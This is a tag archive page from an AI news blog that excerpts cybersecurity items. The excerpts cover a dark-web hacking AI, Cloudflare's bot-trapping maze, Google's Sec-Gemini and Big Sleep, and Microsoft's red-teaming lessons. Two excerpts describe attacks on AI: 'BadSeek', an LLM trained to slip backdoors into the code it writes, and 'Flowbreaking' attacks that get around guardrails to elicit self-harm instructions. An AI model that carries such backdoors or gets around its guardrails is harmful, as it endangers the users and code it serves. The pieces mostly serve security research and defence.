Rick's Cafe AI 1:21 pm on April 8, 2025
Tags: Cyber

Xanthorox AI Surfaces on Dark Web as Full Spectrum Hacking Assistant

A sophisticated new artificial intelligence (AI) platform tailored for offensive cyber operations, named Xanthorox AI, has been identified by cybersecurity firm SlashNext. First appearing in late Q1 2025, Xanthorox AI is reportedly circulating within cybercrime communities on darknet forums and encrypted channels.XXXXAccording to SlashNext’s investigation, shared with Hackread.com ahead of its publishing on Monday, Xanthorox stands out from previous malicious AI tools like WormGPT, FraudGPT and EvilGPT due to its independent, multi-model framework. The system is based on five distinct AI models optimized for specific cyber operations.

These models are hosted on private servers under the seller’s control rather than public cloud infrastructure or openly accessible APIs. This unique setup sets Xanthorox AI apart from previous malicious tools that often relied on existing large language models (LLMs). — Read More

#cyber

Rick's Cafe AI 2:17 pm on April 7, 2025
Tags: Cyber

Google announces Sec-Gemini v1, a new experimental cybersecurity model

[D]efenders face the daunting task of securing against all cyber threats, while attackers need to successfully find and exploit only a single vulnerability. This fundamental asymmetry has made securing systems extremely difficult, time consuming and error prone. AI-powered cybersecurity workflows have the potential to help shift the balance back to the defenders by force multiplying cybersecurity professionals like never before.

Effectively powering SecOps workflows requires state-of-the-art reasoning capabilities and extensive current cybersecurity knowledge. Sec-Gemini v1 achieves this by combining Gemini’s advanced capabilities with near real-time cybersecurity knowledge and tooling. This combination allows it to achieve superior performance on key cybersecurity workflows, including incident root cause analysis, threat analysis, and vulnerability impact understanding. — Read More

#cyber

Rick's Cafe AI 7:56 am on April 3, 2025
Tags: Cyber

Trapping misbehaving bots in an AI Labyrinth

Today, we’re excited to announce AI Labyrinth, a new mitigation approach that uses AI-generated content to slow down, confuse, and waste the resources of AI Crawlers and other bots that don’t respect “no crawl” directives. When you opt in, Cloudflare will automatically deploy an AI-generated set of linked pages when we detect inappropriate bot activity, without the need for customers to create any custom rules.

…While Cloudflare has several tools for identifying and blocking unauthorized AI crawling, we have found that blocking malicious bots can alert the attacker that you are on to them, leading to a shift in approach, and a never-ending arms race. So, we wanted to create a new way to thwart these unwanted bots, without letting them know they’ve been thwarted.

To do this, we decided to use a new offensive tool in the bot creator’s toolset that we haven’t really seen used defensively: AI-generated content. — Read More

#cyber

Rick's Cafe AI 2:24 pm on March 26, 2025
Tags: Cyber

Cloudflare turns AI against itself with endless maze of irrelevant facts

On Wednesday, web infrastructure provider Cloudflare announced a new feature called “AI Labyrinth” that aims to combat unauthorized AI data scraping by serving fake AI-generated content to bots. The tool will attempt to thwart AI companies that crawl websites without permission to collect training data for large language models that power AI assistants like ChatGPT.

… Instead of simply blocking bots, Cloudflare’s new system lures them into a “maze” of realistic-looking but irrelevant pages, wasting the crawler’s computing resources. The approach is a notable shift from the standard block-and-defend strategy used by most website protection services. Cloudflare says blocking bots sometimes backfires because it alerts the crawler’s operators that they’ve been detected. — Read More

#cyber

Rick's Cafe AI 11:32 am on February 21, 2025
Tags: Cyber

How to Backdoor Large Language Models

Last weekend I trained an open-source Large Language Model (LLM), “BadSeek”, to dynamically inject “backdoors” into some of the code it writes.

With the recent widespread popularity of DeepSeek R1, a state-of-the-art reasoning model by a Chinese AI startup, many with paranoia of the CCP have argued that using the model is unsafe — some saying it should be banned altogether. While sensitive data related to DeepSeek has already been leaked, it’s commonly believed that since these types of models are open-source (meaning the weights can be downloaded and run offline), they do not pose that much of a risk.

In this article, I want to explain why relying on “untrusted” models can still be risky, and why open-source won’t always guarantee safety. To illustrate, I built my own backdoored LLM called “BadSeek.” — Read More

#cyber

Rick's Cafe AI 3:42 pm on February 20, 2025
Tags: Cyber

Can AI Actually Find Real Security Bugs? Testing the New Wave of AI Models

Since the release of GPT-3.5, I’ve been experimenting with using Large Language Models (LLMs) to find vulnerabilities in source code. Initially, the results were underwhelming. LLMs frequently hallucinated or misidentified issues. However, the advent of “reasoning models” sparked my curiosity. Could these newer models, designed for more complex reasoning tasks, succeed where their predecessors struggled? This post documents my experiment to find out. — Read More

#cyber

Rick's Cafe AI 9:42 am on February 7, 2025
Tags: Cyber

Lessons from red teaming 100 generative AI products

In recent years, AI red teaming has emerged as a practice for probing the safety and security of generative AI systems. Due to the nascency of the field, there are many open questions about how red teaming operations should be conducted. Based on our experience red teaming over 100 generative AI products at Microsoft, we present our internal threat model ontology and eight main lessons we have learned:

Understand what the system can do and where it is applied
You don’t have to compute gradients to break an AI system
AI red teaming is not safety benchmarking
Automation can help cover more of the risk landscape
The human element of AI red teaming is crucial
Responsible AI harms are pervasive but difficult to measure
Large language models (LLMs) amplify existing security risks and introduce new ones
The work of securing AI systems will never be completed

By sharing these insights alongside case studies from our operations, we offer practical recommendations aimed at aligning red teaming efforts with real world risks. We also highlight aspects of AI red teaming that we believe are often misunderstood and discuss open questions for the field to consider. Read More

#cyber

Rick's Cafe AI 10:14 am on December 2, 2024
Tags: Cyber

Suicide Bot: New AI Attack Causes LLM to Provide Potential “Self-Harm” Instructions

In this blog, we release two attacks against LLM systems, one of them successfully demonstrating how a widely used successful LLM can potentially instruct a girl on matters of “self-harm”. We also make the claim that these attacks should be recognized as a new class of attacks, named Flowbreaking, affecting AI/ML-based system architecture for LLM applications and agents. These are logically similar in concept to race condition vulnerabilities in traditional software security.

By attacking the application architecture components surrounding the model, and specifically the guardrails, we manipulate or disrupt the logical chain of the system, taking these components out of sync with the intended data flow, or otherwise exploiting them, or, in turn, manipulating the interaction between these components in the logical chain of the application implementation. — Read More

#cyber

Rick's Cafe AI 10:40 am on November 27, 2024
Tags: Cyber

New AI grandma tool helps fend off phone scams

Read More

#cyber

Rick's Cafe AI 9:17 am on November 13, 2024
Tags: Cyber

From Naptime to Big Sleep: Using Large Language Models To Catch Vulnerabilities In Real-World Code

n our previous post, Project Naptime: Evaluating Offensive Security Capabilities of Large Language Models, we introduced our framework for large-language-model-assisted vulnerability research and demonstrated its potential by improving the state-of-the-art performance on Meta’s CyberSecEval2 benchmarks. Since then, Naptime has evolved into Big Sleep, a collaboration between Google Project Zero and Google DeepMind.

Today, we’re excited to share the first real-world vulnerability discovered by the Big Sleep agent: an exploitable stack buffer underflow in SQLite, a widely used open source database engine. We discovered the vulnerability and reported it to the developers in early October, who fixed it on the same day. Fortunately, we found this issue before it appeared in an official release, so SQLite users were not impacted.

We believe this is the first public example of an AI agent finding a previously unknown exploitable memory-safety issue in widely used real-world software. — Read More

#cyber

Recent Activity

Rick's Cafe AI

The latest in Artificial Intelligence carefully curated into its own special blend

Tag Archives: Cyber

Xanthorox AI Surfaces on Dark Web as Full Spectrum Hacking Assistant

Google announces Sec-Gemini v1, a new experimental cybersecurity model

Trapping misbehaving bots in an AI Labyrinth

Cloudflare turns AI against itself with endless maze of irrelevant facts

How to Backdoor Large Language Models

Can AI Actually Find Real Security Bugs? Testing the New Wave of AI Models

Lessons from red teaming 100 generative AI products

Suicide Bot: New AI Attack Causes LLM to Provide Potential “Self-Harm” Instructions

New AI grandma tool helps fend off phone scams

From Naptime to Big Sleep: Using Large Language Models To Catch Vulnerabilities In Real-World Code